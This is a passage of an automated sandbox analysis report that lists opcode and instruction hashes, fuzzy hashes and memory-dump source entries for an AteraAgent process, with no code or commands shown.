                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12369fb2cb73f5172de62e956a8f35f1243e1fc73aac795702e0c8ce93c80ca4
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6731B531718E494FDBA4E76CD4A4FBAB3D1EF98300F0545BAD05EC72A6CE24B9468741
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 24a529f25e808c7a86d66ea472f904165aea4caeb78efb9c2535d22fd0e2c91a
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7be01eab123e7fee588575dcb361831f6f032c446695d68d4286a7429186681c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24a529f25e808c7a86d66ea472f904165aea4caeb78efb9c2535d22fd0e2c91a
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F21D522B0FE4E0FEBE9856D6CB95653AC2EFA530071A00BAD458CB2B7DD11ED058341
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ac8a5dde4f2245e398b25a12e877cf773254258b08b061452bbfc3623cd8f69e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dab2fdd4e86986ffa3e589191cc45925ac933e5f50f91e95a70ae17e4b79f060
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac8a5dde4f2245e398b25a12e877cf773254258b08b061452bbfc3623cd8f69e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A1212632B0E9490FEB68A76CBC661B577C0EB99325B0501BBE84DCB2E6DC166C464381
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: ffde2b9b324898bb4b6bef430db929864bc3e485a1988a8e0a6104b1dcb4adcc
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f51a592898d9e0de08db66f85f50721d10af2d577f8ca935e2847125a949e76b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ffde2b9b324898bb4b6bef430db929864bc3e485a1988a8e0a6104b1dcb4adcc
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DE317A2250E7C64FD7578B6888656907FF0AF4722471E05EBC489CF0F7E6689C4ACB52
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: a8e1fcf7bc2fcaabd5feb2734d4e6dbf8ab373e8de1ce8781354b0c962bc058e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 09c1e5e936513e45f327a0173e82ec50e0b357709b8f6b0533979e22e0ea5963
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8e1fcf7bc2fcaabd5feb2734d4e6dbf8ab373e8de1ce8781354b0c962bc058e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97312432B19E4A4FD769D668C466BA577D2EF54300F05447CD0AECB2A6EE29B8818380
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f216979827198aca9e8d7f044806d858af7306157faff7da44ef15f6bbf21cdb
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 6d5d3993cf767fbb635b97bb6c3dca067f31a96584c13bc47fe45aaab49d4acd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f216979827198aca9e8d7f044806d858af7306157faff7da44ef15f6bbf21cdb
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32411A70E0965E8FDB58DBA8C8657B8BBB1EF55301F5400AAD04DE72D6CA342984CB11
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 562789eddf1333c64615324926e9749c6a64f84190bd4bcb318ceaea3747c6cd
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: f825604b313292ecc0c314b9812088ce470994cc3d4966d052a9e6327b9b046e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 562789eddf1333c64615324926e9749c6a64f84190bd4bcb318ceaea3747c6cd
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8531296170F6CA0FE769A77C88656B47FE1DF9724070944FAD099CF1B7D918B80A8340
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: b778187c9e4928242772bc8410af4f1bc49211ed3dfb4fff78c964407c0a1c17
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 80855a531872e8dd75bedf22e98577ccc0188d043446a054453b69d43cff612e
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b778187c9e4928242772bc8410af4f1bc49211ed3dfb4fff78c964407c0a1c17
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B4310430A0960A8FD729EB68D0D09A577A1EF51314B1982F5D06CCF0ABDA2CBD86C7C0
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05cc413ed48022de6eb6f8d88cf49ff0de1221ab8ed8a39572fea97375eeb3ab
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: a4569fc00c86daeae9adcebc75a8558e003702fba65b0ee1f7c0fa3214e0dd59
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05cc413ed48022de6eb6f8d88cf49ff0de1221ab8ed8a39572fea97375eeb3ab
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E921F672E1F68D4FEB969BA498255E8BBB0FF06300F0901BAD049D72E2CA795846C741
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: cbce9908a1e72e01ca33ad8574ae7fb7b40deb3dd556527843351e483b972680
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9197a86002cdba5c1ea4f5364a9cc90ee4d3d77f2d5977c45751d255bc1ca4dd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cbce9908a1e72e01ca33ad8574ae7fb7b40deb3dd556527843351e483b972680
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E21FB63B1FB4906E7B999AC78F50B52BC2DFD566471E01BAD058CB2E2E80668428381
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 03d6479a6a65ce7f8250831b0c0d314037d9e0a509445b8a9800629de0c519b8
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9ddd31cca0befea6e06189e64c78a8316bacd175976d776bda34b55174531ee3
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 03d6479a6a65ce7f8250831b0c0d314037d9e0a509445b8a9800629de0c519b8
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1531C470A0DA8D8FEB55DFA8C4256E9BFF1FF5A300F0401A6D048DB296CB34A941D750
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 81cced046cebc2a29b32c941dc52d124dd373dfb99d20a239055b03e34d9802d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1bd260fa233db47abf230b9f9186eb16f93c24aad51c5a7882f25acacfc5e8e9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81cced046cebc2a29b32c941dc52d124dd373dfb99d20a239055b03e34d9802d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BB216D30E09A5D8FDF95DFA8C8616EDBBF0FF5A300F0401AAD418E7296CA34A8418781
Memory Dump Source
• Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
Memory Dump Source
• Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7bae2a200dc5bdc9f7cf10931dbe2ba2ca1e9d068ba1a2cb13c71e39c087ac9c
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7021C530609A0D8FDBA9EF58C494BA177A1FF49304F150AE8D01DCB29ADA35FD81C780
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 344e4f9343e6ef7965d4290503e5c2bbc8caf40572db7c1f059a3060e5b97a8b
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 7f01e6cad49a073dc597e0e650e71d97c48beaec55ded8285e68fd5ab9f66bff
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 344e4f9343e6ef7965d4290503e5c2bbc8caf40572db7c1f059a3060e5b97a8b
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE11A532B0FD4D0FEAE845AD3CA51753EC2DBD961571A01BBE85CC72B6DC52AD418281
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 678476264f254dfe02abb53f003b9abba2d0c0dba7b5a59e3446397011f09bb0
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9e3db4cc32269eafb00214249a2110a80d62ba2e1e26d574effdf2ba6d77994c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 678476264f254dfe02abb53f003b9abba2d0c0dba7b5a59e3446397011f09bb0
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2211E925A4F6CD0FE762B3A828301A57FA1DF4722470901F7E49CCA0D3D9087955C386
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: e7838adf7d58806afed0fd509de318c3315f3d3a0e436763ca119a75d59b3d19
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: b8539a064015bded78ffcab1207ce7f972f3b5d4b440f42a3376793d7f56ba8c
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7838adf7d58806afed0fd509de318c3315f3d3a0e436763ca119a75d59b3d19
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3115A3020D9498FDBA5EB6CD8A8E617BE0EF6932070A40E7D04CCB262CA14EC45CB91
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9aca07b96b1b6cf333ac696839f8c8b7636d7c9c7ab8d8841b66eb748bed4952
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 337f0dd4ab9ccb699d87089812050e28c7d7c094ade27dfd0051410de568fdd9
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9aca07b96b1b6cf333ac696839f8c8b7636d7c9c7ab8d8841b66eb748bed4952
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5117C63B0EE4F4FFBA8DA5C906427563D2EBA839071545BED41ECB1A5EE11BC0A8740
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4fa4a78d4f216cfff74f8f59cf988897d286706b67d8f5587177254d0bba023e
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 451a5f2c6304d860d44c16104bc081459425c02bf7c05ed7378ddaa78c3b1ed8
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4fa4a78d4f216cfff74f8f59cf988897d286706b67d8f5587177254d0bba023e
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A311E312A0EFC94FE7AA9B7C04741656FE1EF56210B0905BAD4D9CA1E7DC4839458361
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 2c2b29ef6e97f9ab5c5dc066d6bbfffc0caec625163b02927ec6acf0618914fb
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a039309a5ec50ac51fb392bd87e89a9cecc2d92d82a5de4abeede0d973256a7
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c2b29ef6e97f9ab5c5dc066d6bbfffc0caec625163b02927ec6acf0618914fb
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8616b7a5c1ea19efd47e0eb49857fd33df5afda430e777243ad68d178e883f36
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 829b9d9899434ac1ae116e2f2a0c63cacad2d212ede8a7cd31204e8590eba269
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8616b7a5c1ea19efd47e0eb49857fd33df5afda430e777243ad68d178e883f36
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1F0BB2271D58C0FE794955CAC5D9723BD4DB6613231602FFE448C71B3E90698028355
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 596e0836c3b15d49bb44acfd7dabccf11d7a198a728f51d50e2c9cca6692e6fe
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1fa54b39f4d35b621a708737727754feb8ae5cae98036227bde43c5e5911556b
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 596e0836c3b15d49bb44acfd7dabccf11d7a198a728f51d50e2c9cca6692e6fe
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F019630A09B494FD7A5EB288454A767BD1EFD5314F04097EE48AC72A1DA34A541C741
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 560904fe4729301fea7cf8d807c215f6fead7ad01e77a6cdbebb984286c656c5
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 8aac910e4517610c85f045b100f4579d600dcfa8a9295491550d9f97a2ed6cdc
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 560904fe4729301fea7cf8d807c215f6fead7ad01e77a6cdbebb984286c656c5
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2BF0CD35E4964E8BE720AF94A4002F9F7B4EF82310F01213AC01CEB150DB3AAA95CB48
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 936102325533882fec8c753b90c3036a3a3aecd3aad08961d19027e36d1cd2de
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: ac1fc732d25b510d7d842d1eaac53609c1f8bdfa5ce88609aaf04bc6b565d000
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 936102325533882fec8c753b90c3036a3a3aecd3aad08961d19027e36d1cd2de
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EDF0CD36E4A50C8BEB20AF95A4002F8F7B4FB82354F11203AC11CEB150D73AAA95CB48
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2292885574.00007FFD9B830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B830000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b830000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 56e8414b50a3bac310c94ebc1ad9af4a4eb44c9619b5c95e4a4130b677d56d86
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dc466074ab72b82f89009b674e9d6a37f0d483f5e8566ff31f7a2978a27ae95d
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56e8414b50a3bac310c94ebc1ad9af4a4eb44c9619b5c95e4a4130b677d56d86
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29F08131F1C91E4FDBA8EB589861BA87392FB88310F1140B6C00DC33A6DE25AC418781
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.2286331741.00007FFD9B620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B620000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_7ffd9b620000_AteraAgent.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 55f07d1e26465ccac36167cdb79ad980da212d3f62b005e3b78a05dee586e8aa
